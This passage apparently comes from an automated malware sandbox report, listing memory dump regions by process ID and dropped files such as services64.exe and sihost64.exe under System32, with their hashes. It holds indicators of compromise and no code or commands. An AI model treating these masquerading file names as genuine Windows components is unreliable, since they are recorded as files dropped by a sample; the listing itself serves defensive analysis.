SHA512 4858cd5a4999e95b1d971072b7bffeed4018d16d8acea12c743d677512ab3c705b31ff9c70e14a7c52b5368b63076cfcd4750004d49ccb1764d040b5f4a09bd4

memory/1668-95-0x0000000073E30000-0x00000000743DB000-memory.dmp

memory/1668-96-0x0000000002F60000-0x0000000002F61000-memory.dmp

memory/1612-97-0x000007FEEC6E0000-0x000007FEED23D000-memory.dmp

memory/1612-98-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

memory/1612-99-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

memory/1612-100-0x0000000002520000-0x0000000002522000-memory.dmp

memory/1612-101-0x0000000002524000-0x0000000002527000-memory.dmp

memory/1612-103-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

memory/1612-102-0x000000000252B000-0x000000000254A000-memory.dmp

\Windows\System32\services64.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Windows\System32\services64.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b537feb04fff5c541eb94eaae0b98f3b
SHA1 47b66de9f241fe60132c0d12d0908ced00f8707c
SHA256 c01afbb3a7d42d2d2c313d5fce9196aad454c218fb73fc83ca5cc6023ab364ab
SHA512 ce3feac069332544ec468e4fcdff1069424971d3905072e7acb7a676d00b7538be3db53efe356372f0f2159a88baf636c835e2d9b4d3f08444579f949f24960a

\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 3721b324b4d2c9dea6c6bc6a858fe337
SHA1 f3391c6414ed5bb89acc4ab5df2b837077a9a9c6
SHA256 fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206
SHA512 bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

C:\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 3721b324b4d2c9dea6c6bc6a858fe337
SHA1 f3391c6414ed5bb89acc4ab5df2b837077a9a9c6
SHA256 fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206
SHA512 bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

memory/960-110-0x000007FEEC1A0000-0x000007FEECCFD000-memory.dmp

memory/1412-112-0x00000000003E2000-0x00000000003E4000-memory.dmp

memory/1412-111-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

memory/1412-113-0x00000000003E4000-0x00000000003E6000-memory.dmp

memory/1412-114-0x00000000003E6000-0x00000000003E7000-memory.dmp

memory/1412-115-0x00000000003E7000-0x00000000003E8000-memory.dmp

memory/960-116-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

memory/960-117-0x00000000028B0000-0x00000000028B2000-memory.dmp

memory/960-118-0x00000000028B2000-0x00000000028B4000-memory.dmp

memory/960-119-0x00000000028B4000-0x00000000028B7000-memory.dmp

memory/960-120-0x000000001B870000-0x000000001BB6F000-memory.dmp

memory/960-121-0x00000000028BB000-0x00000000028DA000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1452-123-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b537feb04fff5c541eb94eaae0b98f3b
SHA1 47b66de9f241fe60132c0d12d0908ced00f8707c
SHA256 c01afbb3a7d42d2d2c313d5fce9196aad454c218fb73fc83ca5cc6023ab364ab
SHA512 ce3feac069332544ec468e4fcdff1069424971d3905072e7acb7a676d00b7538be3db53efe356372f0f2159a88baf636c835e2d9b4d3f08444579f949f24960a

memory/1452-127-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1616-128-0x000007FEEC6E0000-0x000007FEED23D000-memory.dmp

memory/1616-130-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

memory/1452-131-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1616-132-0x0000000002590000-0x0000000002592000-memory.dmp

memory/1616-134-0x000007FEEDC70000-0x000007FEEE60D000-memory.dmp

memory/1452-136-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1616-137-0x0000000002594000-0x0000000002597000-memory.dmp

memory/1616-135-0x0000000002592000-0x0000000002594000-memory.dmp

memory/1452-139-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1452-141-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1616-142-0x000000001B750000-0x000000001BA4F000-memory.dmp

memory/1452-144-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1616-146-0x000000000259B000-0x00000000025BA000-memory.dmp

memory/1452-147-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1452-149-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1060-151-0x0000000001B20000-0x0000000001B26000-memory.dmp

C:\Windows\system32\services64.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

memory/1452-152-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1060-154-0x0000000000060000-0x0000000000067000-memory.dmp

memory/1060-157-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

memory/1452-156-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1060-158-0x000000001A8B2000-0x000000001A8B4000-memory.dmp

memory/1060-159-0x000000001A8B4000-0x000000001A8B6000-memory.dmp

memory/1060-161-0x000000001A8B6000-0x000000001A8B7000-memory.dmp

memory/1060-162-0x000000001A8B7000-0x000000001A8B8000-memory.dmp

memory/1452-163-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1452-165-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1452-167-0x0000000140000000-0x0000000140786000-memory.dmp